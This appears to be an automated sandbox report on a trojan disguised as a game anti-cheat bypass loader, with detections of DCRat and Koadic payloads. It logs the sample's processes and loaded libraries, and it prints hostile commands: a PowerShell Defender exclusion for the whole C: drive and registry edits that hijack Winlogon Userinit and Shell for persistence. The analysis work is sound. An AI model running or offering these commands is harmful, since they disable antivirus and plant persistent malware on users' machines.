Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00437DF0	13_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00421D81	13_2_00421D81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00439E00	13_2_00439E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042AE15	13_2_0042AE15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407684	13_2_00407684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407684	13_2_00407684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407684	13_2_00407684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040675F	13_2_0040675F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00424F60	13_2_00424F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041D7DF	13_2_0041D7DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00437FE0	13_2_00437FE0
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BAD0F88	15_2_00007FFD9BAD0F88
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BAD3660	15_2_00007FFD9BAD3660
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BAD90B4	15_2_00007FFD9BAD90B4
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BAE0FF2	15_2_00007FFD9BAE0FF2
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BAE0EF2	15_2_00007FFD9BAE0EF2
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BCAA32D	15_2_00007FFD9BCAA32D
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BCA06D0	15_2_00007FFD9BCA06D0
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BCAAB39	15_2_00007FFD9BCAAB39
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BCA854D	15_2_00007FFD9BCA854D

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: String function: 009FF378 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: String function: 009C7A20 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: String function: 009FFB08 appears 141 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00409380 appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00409B10 appears 141 times

Source: Bypass.exe.11.dr

Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f

Source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat, type: DROPPED	Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, type: DROPPED	Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload

Source: 15.2.Bypass.exe.2aa0000.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.Bypass.exe.2ab0000.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.Bypass.exe.1b5c0000.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.Bypass.exe.1bc70000.5.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.Bypass.exe.2a80000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/247@3/3

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF71611B6D8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF71611B6D8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0042B218 CoCreateInstance,

13_2_0042B218

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF716138624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF716138624

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\939f54dd8c64df27b6e4140097f68ee6c8462bf0

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

File created: C:\Users\user\AppData\Local\Temp\Loader

Jump to behavior

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe

Command line argument: Error

12_2_009B6E60

Source: bFZYRLnRIz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: i1O30rxsCL.15.dr, 6apLsw2rGZ.15.dr, VCFVhZnHB8.15.dr, TioHhOeuVT.15.dr, FcPQVm4LOX.15.dr, giYLu2T0Hz.15.dr, dpHgQvJE5m.15.dr, yQOuR0mYbY.15.dr, 4VLz2PivYy.15.dr, D3mlX8RR5D.15.dr, ZVz6RyWa8E.15.dr, SZLfDGGRpQ.15.dr, zqauiY1j27.15.dr, ZgTWGrzv0N.15.dr, 8z9mvwlW78.15.dr, HCTotSIKRY.15.dr, MfC0PbcHsT.15.dr, J0iqErTJgv.15.dr, oUnb6ZfQft.15.dr, IPvPagoFUU.15.dr, U9jEY6UgR2.15.dr, sWQIMVhwH5.15.dr, y1i14RBep3.15.dr, AxxuTWpKE6.15.dr, 9LVlx5UGoz.15.dr, QI3FGOH0ky.15.dr, Fj3HlbMqmv.15.dr, XKMcT8qTKg.15.dr, 3TtieY1LVM.15.dr, kEfX6z25uO.15.dr, JwKr72D0r7.15.dr, gSOigylxmi.15.dr, ec2ad5xz0N.15.dr, pMmNPg4nKy.15.dr, UJCjYQibvX.15.dr, sXNE7ovkfM.15.dr, kj1icB2zdT.15.dr, aVagzIlVpJ.15.dr, 6AROTc7Y9L.15.dr, R4l26ImO9h.15.dr, HpyhWocJAP.15.dr, jH7RGar9G8.15.dr, 8AOKsu2UlM.15.dr, LvZDySLdMj.15.dr, Zd0Fj7CNWa.15.dr, f47IstJBJC.15.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: bFZYRLnRIz.exe	Virustotal: Detection: 56%
Source: bFZYRLnRIz.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

File read: C:\Users\user\Desktop\bFZYRLnRIz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bFZYRLnRIz.exe "C:\Users\user\Desktop\bFZYRLnRIz.exe"
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /c y /n /t 10 /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe C:\Users\user\AppData\Local\Temp\Loader\Loader.exe
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Process created: C:\ProgramData\SoftwareDistribution\Bypass.exe "C:\ProgramData\SoftwareDistribution\Bypass.exe"
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /c y /n /t 10 /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Process created: C:\ProgramData\SoftwareDistribution\Bypass.exe "C:\ProgramData\SoftwareDistribution\Bypass.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: textinputframework.dll	Jump to behavior
